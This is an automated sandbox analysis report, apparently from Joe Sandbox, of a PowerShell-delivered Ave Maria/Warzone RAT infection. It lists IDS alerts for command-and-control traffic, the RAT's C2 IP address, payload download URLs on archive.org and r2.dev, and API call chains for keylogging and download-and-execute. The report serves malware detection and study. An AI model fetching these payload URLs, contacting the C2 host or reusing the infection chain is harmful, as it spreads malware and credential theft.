              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr
              Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2642667288.000000007024F000.00000002.00000001.01000000.0000000B.sdmp, freebl3.dll.5.dr
              Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Source: Yara matchFile source: 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00411446 FindFirstFileW,FindNextFileW,5_2_00411446
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,5_2_0040955B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_6CCCEF35 PR_SetError,_mbsinc,FindFirstFileA,GetLastError,5_2_6CCCEF35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,5_2_0041154A

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2852346 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket : 109.248.151.156:2048 -> 192.168.2.10:49704
              Source: Network trafficSuricata IDS: 2852347 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852350 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT ListPasswordsCommand : 109.248.151.156:2048 -> 192.168.2.10:49704
              Source: Network trafficSuricata IDS: 2839089 - Severity 1 - ETPRO MALWARE Ave Maria RAT Encrypted CnC Checkin (2) : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852352 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT DownloadAndExecuteCommand : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852355 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT VNCGetModule : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852354 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT RemoteModuleLoadResponse : 109.248.151.156:2048 -> 192.168.2.10:49704
              Source: Network trafficSuricata IDS: 2839088 - Severity 1 - ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Outbound (2) : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852351 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT ListPasswordsResponse : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2839087 - Severity 1 - ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Inbound (2) : 109.248.151.156:2048 -> 192.168.2.10:49704
              Source: Network trafficSuricata IDS: 2852348 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT PingCommand : 109.248.151.156:2048 -> 192.168.2.10:49704
              Source: Network trafficSuricata IDS: 2851450 - Severity 1 - ETPRO MALWARE Ave Maria RAT Encrypted CnC KeepAlive Outbound (3) : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2852349 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT PingResponse : 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 162.159.140.237:443 -> 192.168.2.10:49703
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 162.159.140.237:443 -> 192.168.2.10:49703
              Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 162.159.140.237:443 -> 192.168.2.10:49703
              Source: Yara matchFile source: 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Malware configuration extractorURLs: 109.248.151.156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040290E URLDownloadToFileW,ShellExecuteW,5_2_0040290E
              Source: global trafficTCP traffic: 192.168.2.10:49704 -> 109.248.151.156:2048
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /onye.txt HTTP/1.1Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.devConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
              Source: Joe Sandbox ViewIP Address: 162.159.140.237 162.159.140.237
              Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040577F setsockopt,recv,recv,5_2_0040577F
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /onye.txt HTTP/1.1Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.devConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A4249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A447C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A3135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
              Source: powershell.exe, 00000002.00000002.1453682043.0000018D5A059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: powershell.exe, 00000002.00000002.1453682043.0000018D59FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000002.00000002.1453682043.0000018D5A044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: AddInProcess32.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1399307336.000001B2A0BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;$base64Content
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;dk7base64Content
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A447C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A2F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/onye.txt
              Source: AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.140.237:443 -> 192.168.2.10:49703 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,5_2_0040813A
              Source: powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_7ccc600d-6

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 4.2.powershell.exe.1b2b2de3860.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.2.unpack, type: UNPACKEDPE
